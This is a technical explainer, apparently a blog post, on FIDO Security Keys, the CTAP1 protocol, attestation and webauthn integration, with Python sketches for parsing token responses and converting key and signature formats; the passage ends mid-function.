Password managers, however, do not conveniently solve the problem of authenticating new devices, and their automated assistance is generally limited to a web context. They also change a password authentication from an (admittedly weak) verification of the user, to a verification of the device; an effect which has provoked hostility and counter-measures from relying parties.

In light of this, Security Keys should be seen as a way to improve upon, and exceed the abilities of, password managers in a context where the relying party is cooperating and willing to make changes. Security Keys are unphishable to a greater extent than password managers because credentials are bound to a given site, plus it’s infeasible to socially engineer someone to read a binary signature over the phone. Also, like TOTP/HOTP, they use fresh credentials for each site so that no reuse is possible. Unlike password managers, they can work outside of a web context and they can serve to authenticate new devices.

They aren’t magic, however. The unphishability of Security Keys depends on the extent to which the user may be misled into compromising other aspects of their device. If the user can be tricked into installing malware, it could access the Security Key and request login signatures for arbitrary sites. Also, malware may compromise the user’s login session in a browser after successfully authenticating with a Security Key. Still, that’s a heck of a lot better than the common case of people using the same password across dozens of sites.

All the different terms

There is a lot of terminology specific to this topic. I’ve already used the first term above: “relying parties”. This term refers to any entity trying to authenticate a user. When logging into a website, for example, the website is the relying party.

The FIDO Alliance is a group of major relying parties, secure token manufacturers, and others which defines many of the standards around Security Keys. The term that FIDO uses for Security Keys is “Universal 2nd factor” (U2F) so you’ll often see “U2F security key” used—it’s talking about the same thing. The terms “authenticator” and “token” are also often used interchangeably to refer to these devices.

At the time of writing, all Security Keys are based on version one of FIDO’s “Client To Authenticator Protocol” (CTAP1). This protocol is split between documentation of the core protocol and separate documents that describe how the core protocol is transported over USB, NFC, and Bluetooth.

FIDO also defines a U2F Javascript API for websites to be able to interact with and use Security Keys. However, no browser ever implemented that API prior to a forthcoming (at the time of writing) version of Firefox.

But sites have been able to use Security Keys with Google Chrome for some years because Chrome ships with a hidden, internal extension through which the U2F API can be implemented with a Javascript polyfill, which Google also provides. (Extensions for Firefox were also available prior to native support in that browser.)

Thus all sites which supported Security Keys prior to 2018 used some polyfill in combination with Chrome’s internal extension, or one of the Firefox extensions, to do so.

The FIDO Javascript API is not the future, however. Instead, the W3C is defining an official Web Authentication standard for Security Keys, which is commonly called by its short name “webauthn”. This standard is significantly more capable (and significantly more complex) than the U2F API but, by the end of 2018, it is likely that all of Edge, Chrome, and Firefox will support it by default.

The webauthn standard has been designed to work with existing (CTAP1-based) devices, but FIDO is working on an updated standard for tokens, CTAP2, which will allow them to take advantage of the new capabilities in webauthn. (The standards were co-developed so it’s equally reasonable to see it from the other direction and say that webauthn allows browsers to take advantage of the new capabilities in CTAP2.)

There are no CTAP2 devices on the market yet but their major distinguishing feature will be that they can be used as a 1st (and only) factor. I.e. they have enough internal storage that they can contain a username and so both provide an identity and authenticate it. This text will mostly skim over CTAP2 since the devices are not yet available. But developers should keep it in mind when dealing with webauthn as it explains many, otherwise superfluous, features in that standard.

CTAP1 Basics

Since all current Security Keys use CTAP1, and webauthn is backwards compatible with it, understanding CTAP1 is pretty helpful for understanding the space in general. Here I’ll include some Python snippets for communicating with USB CTAP1 devices to make things concrete, although I’ll skip over everything that deals with framing.

CTAP1 defines two operations: creating a new key, and signing with an existing key. I’ll focus on them in turn.

Creating a new key

This operation is called “registration” in CTAP1 terminology and it takes two, 32-byte arguments: a “challenge” and an “application parameter”. From the point of view of the token these arguments are opaque byte strings, but they’re intended to be hashes and the hash function has to be SHA-256 if you want to interoperate.

The challenge argument, when used with a web browser, ends up being the hash of a JSON-encoded structure that includes a random nonce from the relying party as well as other information. This nonce is intended to prove freshness: if it was signed by the newly generated key then the relying party could know that the key really was fresh and that this was the only time it had been registered. Unfortunately, CTAP1 doesn’t include any self-signature (and CTAP2 devices probably won’t either). Instead the situation is a lot more complex, which we’ll get to.

The application parameter identifies a relying party. In U2F it’s a hash of the origin (e.g. SHA-256(“https://example.com”)) while in webauthn it’s a hash of the domain (e.g. SHA-256(“example.com”)). As we’ll see, the signing operation also takes an application parameter and the token checks that it’s the same value that was given when the key was created. A phishing site will operate on a look-alike domain, but when the browser hashes that domain, the result will be different. Thus the application parameter sent to the token will be different and the token will refuse to allow the key to be used. Thus keys are bound to specific origins (or, with webauthn, domains) and cannot be used outside of that context.
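To make the binding concrete, here is a minimal sketch of how the two flavours of application parameter are derived and why a look-alike domain ends up with a different value. The function names and the example domains are my own, chosen only for illustration.

```python
import hashlib


def u2f_application_parameter(origin: str) -> bytes:
    """U2F style: SHA-256 of the origin, e.g. "https://example.com"."""
    return hashlib.sha256(origin.encode("utf-8")).digest()


def webauthn_application_parameter(domain: str) -> bytes:
    """webauthn style: SHA-256 of the domain, e.g. "example.com"."""
    return hashlib.sha256(domain.encode("utf-8")).digest()


# The browser, not the page, computes the hash from where the page really is.
real = webauthn_application_parameter("example.com")
phish = webauthn_application_parameter("examp1e.com")  # look-alike domain

# The token compares these 32-byte values, so the phishing site cannot
# use a key that was created for the real site.
print(real.hex())
print(phish.hex())
print("same key usable on both?", real == phish)
```

Note that the U2F and webauthn values for the same site also differ, which matters later when keys created with the older API need to keep working.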

Here’s some sample code that’ll shine some light on other aspects of the protocol, including the outputs from key creation:

(The full source is available if you want to play with it, although it’ll only work on Linux.)

The first thing to note is that the operation runs in a loop. CTAP1 devices require a “user presence” test before performing operations. In practice this means that they’ll have a button or capacitive sensor that you have to press. While the button/sensor isn’t triggered, operations return a specific error code and the host is expected to retry the operation after a brief delay until it succeeds.
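The retry loop can be sketched roughly as follows. This is not the sample code referred to above: `attempt` is a hypothetical callable standing in for "send the framed request and return the status word plus response body", since framing is out of scope here. The two status words are the ISO 7816 values that CTAP1 uses for success and for "user presence not yet confirmed".

```python
import time
from typing import Callable, Tuple

SW_NO_ERROR = 0x9000
SW_CONDITIONS_NOT_SATISFIED = 0x6985  # button/sensor not yet triggered


def wait_for_touch(attempt: Callable[[], Tuple[int, bytes]],
                   delay: float = 0.25,
                   max_tries: int = 120) -> bytes:
    """Repeat an operation until the user touches the token.

    `attempt` (hypothetical) performs one request and returns
    (status_word, response_body).
    """
    for _ in range(max_tries):
        status, body = attempt()
        if status == SW_NO_ERROR:
            return body
        if status != SW_CONDITIONS_NOT_SATISFIED:
            # Any other status is a real error, so retrying won't help.
            raise RuntimeError(f"token returned status {status:#06x}")
        time.sleep(delay)  # brief pause before polling again
    raise TimeoutError("no touch detected")
```

The delay and retry limit here are arbitrary choices for the sketch; a real host would pick values that suit its user interface.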

A user-presence requirement ensures that operations cannot happen without a human being physically present. This both stops silent authentication (which could be used to track people) and it stops malware from silently proxying requests to a connected token. (Although it doesn’t stop malware from exploiting a touch that the user believes is authorising a legitimate action.)

Once the operation is successful, the response can be parsed. In the spirit of short example code everywhere, errors aren’t checked, so don’t use this code for real.

Key generation, of course, produces a public key. For CTAP1 tokens, that key will always be an uncompressed, X9.62-encoded, ECDSA P-256 public key. That encoding happens to always be 65 bytes long.

After that comes the key handle. This is an opaque value that the token uses to identify this key, and this evinces another important facet of CTAP1: the tokens are nearly stateless in practice.

In theory, the key handle could be a small identifier for a key which is stored on the device. In practice, however, the key handle is always an encrypted version of the private key itself (or a generating seed). This allows storage of the keys to be offloaded to the relying party, which is important for keeping token costs down.

This also means that CTAP1 tokens cannot be used without the user entering a username. The relying party has to maintain a database of key handles, and that database has to be indexed by something. This is changing with CTAP2, but I’ll not mention that further until CTAP2 tokens are being commercially produced.

Lastly, there’s the attestation certificate (just one; no chain) and a signature. As I mentioned above, the signature is sadly not from the newly created key, but from a separate attestation private key contained in the token. This’ll be covered in a later section.
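Putting those four outputs together, a registration response can be pulled apart along these lines. This is a sketch based on my reading of the CTAP1 raw message layout (a reserved 0x05 byte, the 65-byte public key, a one-byte key handle length, the key handle, a DER certificate and then the signature), and unlike the short examples discussed above it does check for errors. All names are my own.

```python
from typing import NamedTuple


class Registration(NamedTuple):
    public_key: bytes        # 65-byte X9.62 uncompressed P-256 point
    key_handle: bytes        # opaque to everyone but the token
    attestation_cert: bytes  # a single DER-encoded X.509 certificate
    signature: bytes         # made with the attestation key


def der_element_length(data: bytes) -> int:
    """Total length (header plus body) of the DER element starting data."""
    if len(data) < 2:
        raise ValueError("truncated DER element")
    first = data[1]
    if first < 0x80:  # short form: the byte is the body length
        return 2 + first
    num = first & 0x7F  # long form: this many length bytes follow
    if num == 0 or len(data) < 2 + num:
        raise ValueError("bad DER length")
    return 2 + num + int.from_bytes(data[2:2 + num], "big")


def parse_registration(resp: bytes) -> Registration:
    if len(resp) < 67 or resp[0] != 0x05:
        raise ValueError("not a CTAP1 registration response")
    public_key = resp[1:66]
    if public_key[0] != 0x04:
        raise ValueError("expected an uncompressed public key")
    kh_len = resp[66]
    key_handle = resp[67:67 + kh_len]
    if len(key_handle) != kh_len:
        raise ValueError("truncated key handle")
    rest = resp[67 + kh_len:]
    # The certificate has no explicit length field, so its own DER
    # header is used to find where the signature begins.
    cert_len = der_element_length(rest)
    if cert_len > len(rest):
        raise ValueError("truncated certificate")
    return Registration(public_key, key_handle,
                        rest[:cert_len], rest[cert_len:])
```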

Signing with a key

Once a key has been created, we can ask the token to sign with it.

Again, a “challenge” and “application parameter” have to be given, and they have the same meaning and format as when creating a key. The application parameter has to be identical to the value presented when the key was created otherwise the token will return an error.

The code looks very similar:

The same pattern for waiting for a button press is used: the token is polled and returns an error until the button/sensor is pressed.

Three values are returned: a flag confirming that the button was pressed, a signature counter, and the signature itself—which signs over the challenge, application parameter, flags, and counter.
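As a rough sketch of that layout: the response is one flags byte, a four-byte big-endian counter, and then the signature, and the signed message is the application parameter, flags, counter, and challenge concatenated in that order. The byte order comes from my reading of the CTAP1 raw message format rather than from the text above, and the function names are my own.

```python
import struct
from typing import Tuple


def parse_sign_response(resp: bytes) -> Tuple[bool, int, bytes]:
    """Return (user_present, counter, signature)."""
    if len(resp) < 5:
        raise ValueError("truncated sign response")
    flags = resp[0]
    (counter,) = struct.unpack(">I", resp[1:5])
    return bool(flags & 0x01), counter, resp[5:]


def signed_message(app_param: bytes, flags: int, counter: int,
                   challenge: bytes) -> bytes:
    """Rebuild the bytes that the token's signature covers."""
    if len(app_param) != 32 or len(challenge) != 32:
        raise ValueError("both hashes must be 32 bytes")
    return app_param + bytes([flags]) + struct.pack(">I", counter) + challenge


present, counter, sig = parse_sign_response(b"\x01\x00\x00\x01\xaf" + b"...")
print(present, counter)
```

A relying party would verify the ASN.1-encoded ECDSA signature over `signed_message(...)` using the public key saved at registration.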

In the web context, the challenge parameter will be the hash of a JSON structure again, and that includes a nonce from the relying party. Therefore, the relying party can be convinced that the signature has been freshly generated.

The signature counter is a strictly monotonic counter and the intent is that a relying party can record the values and so notice if a private key has been duplicated, as the strictly-monotonic property will eventually be violated if multiple, independent copies of the key are used.

There are numerous problems with this, however. Firstly, recall that CTAP1 tokens have very little state in order to keep costs down. Because of that, all tokens that I’m aware of have a single, global counter shared by all keys created by the device. (The only exception I’ve seen is the Bluink key because it keeps state on a phone.) This means that the value and growth rate of the counter is a trackable signal that’s transmitted to all sites that the token is used to login with. For example, the token that I’m using right now has a counter of 431 and I probably use it far more often than most because I’m doing things like writing example Python code to trigger signature generation. I’m probably pretty identifiable because of that.

A signature counter is also not a very effective defense, especially if it’s per-token, not per-key. Security Keys are generally used to bless long-term logins, and an attacker is likely to be able to login once with a cloned key. In fact, the login that violates the monotonicity of the counter will probably be a legitimate login so relying parties that strictly enforce the requirement are likely to lock the real user out after a compromise.

Since the counter is almost universally per-token, that means that it’ll commonly jump several values between logins to the same site because the token will have been used to login elsewhere in-between. That makes the counter less effective at detecting cloning. If login sessions are long-lived, then the attacker may only need to sign once and quite possibly never be detected. If an attacker is able to observe the evolution of the counter, say by having the user login to an attacker-controlled site periodically, they can avoid ever triggering a counter regression on a victim site.
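The check itself, and the way a clone can cause the legitimate user to be the one who trips it, can be sketched like this. The `CounterState` record is a hypothetical piece of relying-party state, and the sketch only records regressions rather than deciding what to do about them.

```python
from dataclasses import dataclass


@dataclass
class CounterState:
    last_seen: int = -1   # nothing observed yet
    regressions: int = 0  # how many times monotonicity was violated


def observe_counter(state: CounterState, received: int) -> bool:
    """Record a counter value; return False if it failed to increase."""
    if received > state.last_seen:
        state.last_seen = received
        return True
    state.regressions += 1
    return False


# The real token was last seen at 431. An attacker with a clone logs in
# first and picks a value comfortably ahead of it.
state = CounterState(last_seen=431)
attacker_ok = observe_counter(state, 440)

# The real token, used elsewhere a few times since, is now at 435.
# It is the legitimate user who fails the check.
victim_ok = observe_counter(state, 435)
print(attacker_ok, victim_ok, state.regressions)
```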

Finally, signature counters move the threat model from one that deals with phishing and password reuse, to one where attackers are capable of extracting key material from hardware tokens. That’s quite a change and the signature counter is not optional in the protocol.

Attestation

When creating a key we observed that the token returned a certificate, and a signature over the newly created key by that certificate. Here’s the certificate from the token that I happen to be using as I write this:

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 95815033 (0x5b60579)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = Yubico U2F Root CA Serial 457200631
        Validity
            Not Before: Aug  1 00:00:00 2014 GMT
            Not After : Sep  4 00:00:00 2050 GMT
        Subject: CN = Yubico U2F EE Serial 95815033
        Subject Public Key Info:
            Public Key Algorithm: id-ecPublicKey
                Public-Key: (256 bit)
                pub:
                    04:fd:b8:de:b3:a1:ed:70:eb:63:6c:06:6e:b6:00:
                    69:96:a5:f9:70:fc:b5:db:88:fc:3b:30:5d:41:e5:
                    96:6f:0c:1b:54:b8:52:fe:f0:a0:90:7e:d1:7f:3b:
                    ff:c2:9d:4d:32:1b:9c:f8:a8:4a:2c:ea:a0:38:ca:
                    bd:35:d5:98:de
                ASN1 OID: prime256v1
                NIST CURVE: P-256
        X509v3 extensions:
            1.3.6.1.4.1.41482.2:
                1.3.6.1.4.1.41482.1.1
    Signature Algorithm: sha256WithRSAEncryption

Clearly, it identifies the manufacturer and the unknown extension in there identifies the exact model of the key.

The certificate, despite the 32-bit serial number, doesn’t uniquely identify the device. The FIDO rules say that at least 100 000 other devices should share the same certificate. (Some devices mistakenly shipped with uniquely identifying attestation certificates. These will be recognised and suppressed in Chrome 67.) This device happens to be a special, GitHub-branded one. I don’t know whether this attestation certificate is specific to that run of devices, but the same model of device purchased on Amazon around the same time (but unbranded) had a different certificate serial number, so maybe.

But the practical upshot is that a relying party can determine, with some confidence, that a newly created key is stored in a Yubico 4th-gen U2F device by checking the attestation certificate and signature. That fact should cause people to pause; it has weighty ramifications.

Traditionally, anyone who implemented the various specifications that make up a web browser or server has been an equal participant in the web. There’s never been any permission needed to create a new browser or server and, although the specifications on the client side are now so complex that implementing them is a major effort, it’s possible to leverage existing efforts and use WebKit, Firefox, or Chromium as a base.

(The DRM in Encrypted Media Extensions might be an exception, and there was an appropriately large fight over that. I’m not making any judgment about the result of that here though.)

But with attestation, it’s quite possible for a site to require that you have particular hardware if you want to use webauthn. The concerns about that vary depending on the context: for an internal, corporate site to demand employees use particular hardware seems unobjectionable; a large public site raises many more concerns. There appear to be two, main ways in which this could develop in an unhealthy direction:

Firstly, as we’ve experienced with User-Agent headers, sites are not always as responsive as we would like. User-Agent headers have layers upon layers of browsers spoofing other browsers—the history of browser development is written in there—all because of this. Spoofing was necessary because sites would implement workarounds or degraded experiences for some browsers but fail to update things as the browser landscape changed. In order to be viable, each new browser entrant had to spoof the identity of the currently dominant one.

But attestation is not spoofable. Therefore, if sites launch webauthn support and accept attestations from the current set of token vendors, future vendors may be locked out of the market: Their devices won’t work because their attestations aren’t trusted, and they won’t be able to get sites to update because they won’t have enough market presence to matter.

If things get really bad, we may see a market develop where attestation certificates are traded between companies to overcome this. The costs of that are ultimately borne by increased token prices, which users have to pay.

The second concern is that, if different sites adopt different policies, users can have no confidence that a given token will work on a given site. They may be forced to have multiple tokens to span the set of sites that they use, and to remember in each case which token goes with which site. This would substantially degrade the user experience.

FIDO does not dismiss these worries and their answer, for the moment, is the metadata service (MDS). Essentially this is a unified root store that all sites checking attestation are supposed to use and update from. That would solve the problem of site stagnation by creating a single place for new vendors to submit their roots which would, in theory, then auto-update everywhere else. It would also help with the problem of divergent policies because it includes a FIDO-specified security-level for each type of token, which would at least reduce the variety of possible policies and make them more understandable—if used.

The challenge at the moment is that major vendors are not even included in the MDS, and using the MDS properly is harder for sites than throwing together a quick hack that’ll be “good enough for now”.

Thus my advice is for sites to ignore attestation if you’re serving the public. As we’ll see when we cover the webauthn API, attestation information is not even provided by default. Sites newly supporting webauthn are probably just using passwords, or maybe SMS OTP, and thus Security Keys offer a clear improvement. Worrying about whether the Security Key is a physical piece of hardware, and what certifications it has, is a distraction.

webauthn

Now that we understand the underlying protocol, here’s how to actually use it. As mentioned above, there’s an older, “U2F” API but that’ll disappear in time and so it’s not covered here. Rather, the future is the W3C Web Authentication API, which builds on the Credential Management API.

Right now, if you want to experiment, you can use Firefox Nightly, Chrome Canary, or Edge 14291+. In Firefox Nightly, things should be enabled by default. For Chrome Canary, run with --enable-features=WebAuthentication --enable-experimental-web-platform-features. For Edge, I believe that you have to enable it in about:flags, but I’m just going off documentation.

Testing for support

Before trying to use webauthn, you should use feature detection to ensure that it’s supported by a given browser:

Creating a new key

The following are partial snippets of Javascript for creating a key. In-between the snippets is discussion so you would need to concatenate all the snippets in this section to get a complete example.

The name field is required, but currently discarded. In the future it’s intended that CTAP2 tokens will be able to store this and so it could be used in an account chooser interface.

The id field is optional and it sets the relying party ID (RP ID) of the credential. This is the domain name associated with the key and it defaults to the domain that’s creating the key. It can only be overridden to set it within the eTLD+1 of the current domain—like a cookie.

All these fields are required. However, like the previous chunk, they’re currently discarded and intended for forthcoming CTAP2 tokens.

The id identifies an account. A given CTAP2 token should not store two keys for the same RP ID and user ID. However, it’s possible that CTAP2 keys will allow blind enumeration of user IDs given physical possession of the token. (We have to see how that part of the CTAP2 spec is implemented in practice.) Therefore, you don’t want to store a username in the id field. Instead you could do something like HMAC-SHA256(key = server-side-secret, input = username)[:16]. (Although you’ll need a reverse index in the future if you want to use CTAP2 tokens in 1st-factor mode.)
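The HMAC construction suggested above might look like this on the server. The secret shown is a placeholder and the function name is my own; the only real requirement is that the key stays on the server.

```python
import hashlib
import hmac


def webauthn_user_id(server_side_secret: bytes, username: str) -> bytes:
    """HMAC-SHA256(key = server-side-secret, input = username)[:16]."""
    mac = hmac.new(server_side_secret, username.encode("utf-8"),
                   hashlib.sha256)
    return mac.digest()[:16]


# Placeholder secret for illustration only. Use a long random value
# that never leaves the server.
SECRET = b"replace-with-a-real-random-secret"

print(webauthn_user_id(SECRET, "alice").hex())
```

Because the mapping is one-way, anyone enumerating user IDs on a token learns nothing about the usernames, but for the same reason the server needs its own index from ID back to account if it ever has to look a user up by ID.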

The name and displayName are again strings intended for a future account chooser UI that doesn’t currently exist.

The challenge field for a new key is a little complex. The webauthn spec is very clear that this must be a strong, server-generated nonce and, for the assertion request which we’ll get to next, that’s correct. Also, if you’re checking attestation then this challenge is your only assurance of freshness, so you’ll want it in that case too.

However, as I mentioned above, it’s far from clear how well attestation will work outside of a controlled environment and I recommend that you ignore it in the general case. Given that, the utility of the challenge when creating a key is questionable. Generated U2F keys don’t sign over it and, while CTAP2 keys have the option of covering it with a self-signature, it remains to be seen whether any will actually do that.

One advantage that it does bring is that it stops CSRF attacks from registering a new key. But, if you don’t have a solid, general solution to CSRF already then you have far larger security issues.

Thus, since it’s easy and you’ll need it for assertions anyway, I still recommend that you generate a 16- or 32-byte nonce on the server as the spec suggests. I just thought that you should be aware that the benefit is a little fuzzier than you might imagine.
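Generating and later checking such a nonce is only a few lines. In this sketch `session` is a stand-in for whatever per-user server-side session storage you already have (a plain dict here), and the key name is arbitrary.

```python
import hmac
import secrets


def new_challenge(session: dict, num_bytes: int = 32) -> bytes:
    """Create a fresh nonce and remember it for this user's session."""
    challenge = secrets.token_bytes(num_bytes)
    session["webauthn_challenge"] = challenge
    return challenge


def consume_challenge(session: dict, presented: bytes) -> bool:
    """Check a returned nonce. Each one is accepted at most once."""
    expected = session.pop("webauthn_challenge", None)
    return expected is not None and hmac.compare_digest(expected, presented)
```

Removing the stored value on the first check, whether it matched or not, is a design choice in this sketch so that a response can't be replayed.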

This enumerates the types of public keys that the server can process. The type field is always public-key and the alg comes from the IANA COSE list. The value -7 means ECDSA with P-256, which is effectively mandatory since it’s what all U2F tokens implement. At the moment, that’s the only value that makes sense although there might be some TPM-based implementations in the future that use RSA.

The timeout specifies how many milliseconds to wait for the user to select a token before returning an error.

The excludeCredentials is something that can be ignored while you get something working, but which you’ll have to circle back and read the spec on before deploying anything real. It allows you to exclude tokens that the user has already created a key on when adding new keys.
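For reference, here is one way the server might assemble all of the fields discussed in this section before handing them to the page. The field names are those from the webauthn spec, but shipping the structure as JSON with base64url-encoded binary values is purely an assumption of this sketch: the page's own script would have to decode those values into buffers before calling the browser API.

```python
import base64
import json
from typing import Iterable


def b64url(data: bytes) -> str:
    """Unpadded base64url, a convenient way to carry bytes in JSON."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def creation_options(rp_name: str, user_id: bytes, username: str,
                     display_name: str, challenge: bytes,
                     existing_credential_ids: Iterable[bytes] = (),
                     timeout_ms: int = 60000) -> dict:
    return {
        # "id" is omitted from rp so it defaults to the current domain.
        "rp": {"name": rp_name},
        "user": {"id": b64url(user_id), "name": username,
                 "displayName": display_name},
        "challenge": b64url(challenge),
        # -7 is ECDSA with P-256, the only value U2F tokens implement.
        "pubKeyCredParams": [{"type": "public-key", "alg": -7}],
        "timeout": timeout_ms,
        # Stops a token that already holds a key from registering again.
        "excludeCredentials": [{"type": "public-key", "id": b64url(c)}
                               for c in existing_credential_ids],
    }


opts = creation_options("Example", bytes(16), "alice", "Alice",
                        bytes(32), [b"\x01\x02"])
print(json.dumps(opts, indent=2))
```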

The promise will, if everything goes well, resolve to a PublicKeyCredential, the response member of which is an AuthenticatorAttestationResponse. I’m not going to pointlessly rewrite all the server-side processing steps from the spec here but I will note a couple of things:

Firstly, if you don’t know what token-binding is, that’s fine: ignore it. Same goes for extensions unless you previously supported the U2F API, in which case see the section below. I also suggest that you ignore the parts dealing with attestation (see above), which eliminates 95% of the complexity. Lastly, while I recommend following the remaining steps, see the bit above about the challenge parameter and don’t erroneously believe that checking, say, the origin member of the JSON is more meaningful than it is.

I’ll also mention something about all the different formats in play here: In order to process webauthn, you’ll end up dealing with JSON, ASN.1, bespoke binary formats, and CBOR. You may not have even heard of the last of those but CBOR is yet another serialisation format, joining Protocol Buffers, Msgpack, Thrift, Cap’n Proto, JSON, ASN.1, Avro, BSON, …. Whatever you might think of the IETF defining another format rather than using any of the numerous existing ones, you will have to deal with it to support webauthn, and you’ll have to deal with COSE, the CBOR translation of JOSE/JWT. You don’t have to support tags or indefinite lengths in CBOR though because the CTAP2 canonicalisation format forbids them.

The problem is that there’s going to be a lot of people having to implement converters from COSE key format to something that their crypto library accepts. Maybe I should start a GitHub repo of sample code for that in various libraries. But, short of that, here’s a quick reference to help you navigate all the different formats in play:

COSE Key

Used in: the public key in the attested credential data when creating a key. You have to parse this because you need the public key in order to check assertions.
Format: a CBOR map, defined here. However, you’ll struggle to figure out, concretely, what the keys in that map are from the RFC so, for reference, if you’re decoding a P-256 key you should expect these entries in the map: 1 (key type) = 2 (elliptic curve, x&y), 3 (algorithm) = -7 (ECDSA with SHA-256), -1 (curve) = 1 (P-256), and then x and y coordinates are 32-byte values with keys -2 and -3, respectively.
How to recognise: the first nibble is 0xa, for a small CBOR map.
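As a small illustration of those map entries, this sketch converts a COSE P-256 key into the X9.62 form described next. It assumes that some CBOR library has already decoded the bytes into a Python dict with integer keys and `bytes` values; the decoding itself is not shown.

```python
def cose_p256_to_x962(cose_key: dict) -> bytes:
    """Convert a decoded COSE P-256 key to a 65-byte X9.62 point."""
    if cose_key.get(1) != 2:      # key type: elliptic curve, x & y
        raise ValueError("not an EC2 key")
    if cose_key.get(3) != -7:     # algorithm: ECDSA with SHA-256
        raise ValueError("unexpected algorithm")
    if cose_key.get(-1) != 1:     # curve: P-256
        raise ValueError("unexpected curve")
    x, y = cose_key.get(-2), cose_key.get(-3)
    for coord in (x, y):
        if not isinstance(coord, bytes) or len(coord) != 32:
            raise ValueError("coordinates must be 32-byte strings")
    return b"\x04" + x + y        # 0x04 marks an uncompressed point
```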

X9.62 key

Used in: lots of things, this is the standard format for EC public keys. Contained within the SPKI format, which is used by Web Crypto and X.509.
Format: a type byte (0x04 for standard, uncompressed keys), followed by x and y values.
How to recognise: for P-256, it’s 65 bytes long and starts with 0x04. (There’s also a compressed version of X9.62 but it’s exceedingly rare.)

SPKI

Used in: X.509 and Web Crypto.
Format: an ASN.1 structure called SubjectPublicKeyInfo: an algorithm identifier followed by a lump of bytes in an algorithm-specific format, which is X9.62 for elliptic-curve keys.
How to recognise: starts with 0x30.
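For P-256 specifically, the ASN.1 wrapping around the X9.62 point never changes, so going between the two can be done with a fixed prefix rather than a full ASN.1 library. This is a sketch for that one curve only, and the names are my own.

```python
# SEQUENCE { SEQUENCE { OID id-ecPublicKey, OID prime256v1 },
#            BIT STRING (0 unused bits) ... }
P256_SPKI_PREFIX = bytes.fromhex(
    "3059301306072a8648ce3d020106082a8648ce3d030107034200")


def x962_to_spki(point: bytes) -> bytes:
    """Wrap an uncompressed P-256 point in a SubjectPublicKeyInfo."""
    if len(point) != 65 or point[0] != 0x04:
        raise ValueError("expected a 65-byte uncompressed P-256 point")
    return P256_SPKI_PREFIX + point


def spki_to_x962(spki: bytes) -> bytes:
    """Extract the X9.62 point from a P-256 SubjectPublicKeyInfo."""
    if len(spki) != 91 or not spki.startswith(P256_SPKI_PREFIX):
        raise ValueError("not a P-256 SubjectPublicKeyInfo")
    return spki[len(P256_SPKI_PREFIX):]
```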

ASN.1 signatures

Used in: nearly everything that deals with ECDSA signatures.
Format: an ASN.1 SEQUENCE containing two INTEGER values for ECDSA’s r and s values.
How to recognise: starts with 0x30 and you’re expecting a signature, not a key.

“Raw” signatures

Used in: Web Crypto.
Format: a pair of 32-byte values (for P-256).
How to recognise: 64 bytes long.
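Converting between the two signature formats is mostly bookkeeping. The sketch below handles P-256 only, where every length fits in a single byte, and is stricter than it needs to be in places. The function names are my own.

```python
def _der_int(n: int) -> bytes:
    # A leading zero byte is added whenever the top bit would be set,
    # because ASN.1 INTEGERs are signed.
    body = n.to_bytes((n.bit_length() + 8) // 8, "big")
    return b"\x02" + bytes([len(body)]) + body


def raw_to_der(raw: bytes) -> bytes:
    """64-byte r || s to an ASN.1 SEQUENCE of two INTEGERs."""
    if len(raw) != 64:
        raise ValueError("expected 64 bytes")
    body = (_der_int(int.from_bytes(raw[:32], "big")) +
            _der_int(int.from_bytes(raw[32:], "big")))
    return b"\x30" + bytes([len(body)]) + body


def der_to_raw(sig: bytes) -> bytes:
    """ASN.1 SEQUENCE of two INTEGERs to 64-byte r || s."""
    if len(sig) < 8 or sig[0] != 0x30 or sig[1] != len(sig) - 2:
        raise ValueError("not a short-form DER SEQUENCE")
    pos, out = 2, b""
    for _ in range(2):
        if pos + 2 > len(sig) or sig[pos] != 0x02:
            raise ValueError("expected INTEGER")
        length = sig[pos + 1]
        value = sig[pos + 2:pos + 2 + length]
        if length == 0 or len(value) != length or value[0] & 0x80:
            raise ValueError("bad INTEGER")
        n = int.from_bytes(value, "big")
        if n >= 1 << 256:
            raise ValueError("value too large for P-256")
        out += n.to_bytes(32, "big")
        pos += 2 + length
    if pos != len(sig):
        raise ValueError("trailing data")
    return out
```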

Getting assertions

Once you have one (or more) keys registered for a user you can challenge them for a signature. Typically this is done at login time although CTAP2 envisions user verifying tokens that take a fingerprint or PIN number, so signatures from those devices could replace reauthentication requests. (I.e. those times when a site asks you to re-enter your password before showing particularly sensitive information.)

When getting an assertion, the challenge (i.e. nonce) really must be securely generated at the server—there’s none of the equivocation as with generation.

The credentialID values are those extracted from the attested credential data from the registration.

Again, there’s no need for me to reiterate the processing steps already enumerated in the spec except to repeat that you can ignore token-binding if you don’t know what it is, and to reference the comments above about signature counters. If you implement the signature counter check, you should think through how the user will experience various scenarios and ensure that you’re monitoring metrics for the number of counter failures observed. (I don’t think we know, in practice, how often counter writes will be lost, or counters will be corrupted.)
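One of those processing steps, checking the client data JSON that the browser produces, can be sketched as follows. The member names (`type`, `challenge`, `origin`) and the unpadded base64url encoding of the challenge are from the webauthn spec as I understand it; the function itself and its parameters are hypothetical, and this is only one step of several.

```python
import base64
import hmac
import json


def b64url_decode(text: str) -> bytes:
    # Restore the padding that base64url normally omits.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def check_client_data(client_data_json: bytes, expected_challenge: bytes,
                      expected_origin: str,
                      expected_type: str = "webauthn.get") -> bool:
    """True if the client data matches what the server asked for."""
    try:
        data = json.loads(client_data_json)
        presented = b64url_decode(data["challenge"])
    except (ValueError, KeyError, TypeError):
        return False  # malformed input is simply rejected
    return (data.get("type") == expected_type
            and data.get("origin") == expected_origin
            and hmac.compare_digest(presented, expected_challenge))
```

For registration the expected type would be "webauthn.create" instead. The signature check over the authenticator data and the hash of this JSON still has to follow.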

Supporting keys created with the U2F API

This is just for the handful of sites that supported Security Keys using the older, U2F API. If you have keys that were registered with that API then they aren’t immediately going to work with webauthn because the AppID from U2F is a URL, but the relying party ID in webauthn is just a domain. Thus the same origin is considered to be a different relying party when using U2F and webauthn and the keys won’t be accepted. (Just the same as if you tried to use a credential ID from a different site.)

However, there is a solution to this: in the publicKey argument of the get call add an extensions field containing a dict with a key appid whose value is the AppID of your U2F keys. This can be done uniformly for all keys if you wish since both the relying party ID and AppID will be tried when this is asserted. With this in place, keys registered with U2F should work with webauthn.
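On the server side, the consequence is that the relying party hash at the start of the authenticator data (its first 32 bytes) may be the hash of either the relying party ID or the AppID, depending on which one the token accepted. A sketch of accepting both, based on my understanding of how the extension behaves and using made-up names and an example AppID URL:

```python
import hashlib
import hmac
from typing import Optional


def rp_id_hash_ok(authenticator_data: bytes, rp_id: str,
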